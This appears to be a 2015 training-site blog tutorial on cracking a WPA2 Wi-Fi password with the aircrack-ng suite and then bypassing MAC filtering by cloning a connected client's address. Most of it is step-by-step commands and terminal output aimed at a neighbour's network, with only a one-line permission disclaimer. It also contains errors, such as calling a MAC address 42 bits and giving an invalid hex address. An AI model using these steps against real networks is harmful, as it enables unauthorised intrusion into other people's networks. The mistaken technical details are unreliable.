Ready to Start Your Career?

Hacking a WiFi Network with MAC Filtering Enabled

Rana Daniyal Khan's profile image
By: Rana Daniyal Khan
September 21, 2015
Don't try this on networks on which you lack permission for penetration testing. Intro:

MAC:

"MAC is a 42 bit address used to uniquely identify a device. "

"MAC filtering is a way in which the network administrator allows only specific mac address to connect to the router."

 

Let's divide this topic in two threads:

[-] Crack WiFi network.

[-] Get in to it even if MAC filtering is enabled.

 Tools:1-Kali Linux

Rather then downloading this separately and spending your time configuring the tools, download "Kali Linux" because it's the mother of all possible tools available out there.

2-Wireless card capable of monitoring If you have both, then let's start:Crack a WiFi network:First disconnect all wireless connections.Open your terminal:Command: airmon-ng start [your WLAN card]If you don't know the name of your WLAN card, open terminal type ifconfig and check the name there. All network adapters will be showing there.It is usually "wlan0." So, let's use wlan0 as network card name.Type: airmon-ng start wlan0Hit Enter.It will print some thing like this:
Found 6 processes that could cause trouble.If airodump-ng, aireplay-ng or airtun-ng stops working aftera short period of time, you may want to kill (some of) them! PID Name 661 NetworkManager 763 wpa_supplicant 1032 avahi-daemon 1036 avahi-daemon10136 dhclient10295 dhclientPHY Interface Driver Chipsetphy0 wlan0 iwlwifi Intel Corporation Centrino Advanced-N 6200 (rev 35) (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) (mac80211 station mode vif disabled for [phy0]wlan0)
Now, your network card is in monitor state.You can see the monitor is enabled on "wlan0mon"
Command: airodump-ng [monitor interface]As our monitor interface is "wlan0mon"Type : airodump-ng wlan0monIf it gives eror like:ioctl(SIOCSIWMODE) failed: Device or resource busyARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Makesure RFMON is enabled: run 'airmon-ng start wlan0mon <#>'Sysfs injection support was not found either.Then use these there commands to correct this and run above command again.ifconfig wlan0 downiwconfig wlan0 mode monitorifconfig wlan0 upNow you can see all wifi networks in your range wait for your desired wifi network to be shown after that hit ctrl+c dont close or clear the terminal you need some info from there.It will be like this:
CH 7 ][ Elapsed: 24 s ][ 2015-09-20 04:02 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 1C:sB:25:4F:93:F3 -44 27 0 0 11 54 WPA2 CCMP PSK neibour 30:B9:21:FB:5E:DB -64 19 0 0 1 54e WPA CCMP PSK Hoes 58:3A:35:6A:60:31 -83 27 0 0 8 54e WPA2 CCMP PSK club 3A:6C:F5:4E:68:AB -87 9 0 0 1 54e. WPA2 CCMP PSK public
The next command is: airodump-ng --bssid [mac of router] -c [channel ] --write [Out put file name] [monitor interface]Get the MAC channel info of your target network from airodump-ng wlan0mon command's output.Lets penetrate neibour: airodump-ng --bssid 1C:sB:25:4F:93:F3 -c 11 --write WPAcrack wlan0monHit Enter.It will look like:
CH 11 ][ Elapsed: 1 min ][ 2015-09-20 04:10 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E 1C:sB:25:4F:93:F3 -44 100 716 95 0 11 54 WPA2 CCMP PSK B BSSID STATION PWR Rate Lost Frames Probe 1C:sB:25:4F:93:F3 18:87:96:11:9B:A8 -30 1 -54 0 6 1C:sB:25:4F:93:F3 70:0B:C0:5F:68:56 -67 18 - 1 0 48 1C:sB:25:4F:93:F3 34:23:BA:28:B5:0E -68 1 -11 0 5 1C:sB:25:4F:93:F3 44:91:DB:A5:66:78 -81 11 - 1 0 30
 Now, wait for the "hand shake" text to appear on the terminal. Congrats! You know have password hashes and time to crack them. You'll get passwords in plain text form - be sure to use your best word list, because this all depends on your word list .Open another terminal and don't close the previous one, as we need some info from it.Command:aircrack-ng [captured password hash file name] -w [word list]Type:aircrack-ng WPAcrack-01.cap -w wordlist.txt Now, pray.If your prayer and the wordlist worked, you got the password. Now, login to WiFi. At this point, you might have this question:Q)Holy crab whats that authentication problem??? What should I do now??A)You have to be cool.This means the MAC filtering is enabled. Get in to it even the mac filtering is enabled.
CH 11 ][ Elapsed: 1 min ][ 2015-09-20 04:10 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E 2C:AB:25:4F:93:F3 -44 100 716 95 0 11 54 WPA2 CCMP PSK B
Navigate to the out put of "airodump-ng --bssid 10:AB:25:4F:93:F3 -c 11 --write WPAcrack wlan0mon" command you can see mac address under "STATION"
BSSID STATION PWR Rate Lost Frames Probe 1C:sB:25:4F:93:F3 18:87:96:11:9B:A8 -30 1 -54 0 6 1C:sB:25:4F:93:F3 70:0B:C0:5F:68:56 -67 18 - 1 0 48 1C:sB:25:4F:93:F3 34:23:BA:28:B5:0E -68 1 -11 0 5 1C:sB:25:4F:93:F3 44:91:DB:A5:66:78 -81 11 - 1 0 30
Do you see 'em?These are the MAC addresses of users connected to the network. Now, you might be thinking:Q)So, let's cool it?? :/A) If you are thinking this, then it's time to use brain.py xD. These MAC addresses are allowed to connect to network. If you have this MAC address, the MAC filter will not block you.Time to clone xDOpen terminal:Command 1: ifconfig wlan0 downCommand 2: ifconfig wlan0 hw ether [desired mac adress]Command 3: ifconfig wlan0 upChoose one of the MAC address from under the station output. Let's use 34:23:BA:28:B5:0EAnd type:Command 1: ifconfig wlan0 downCommand 2: ifconfig wlan0 hw ether 34:23:BA:28:B5:0ECommand 3: ifconfig wlan0 upType :ifconfig to conform that your MAC is changed Now??Now what man just connected already xD?
Schedule Demo
Build your Cybersecurity or IT Career
Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry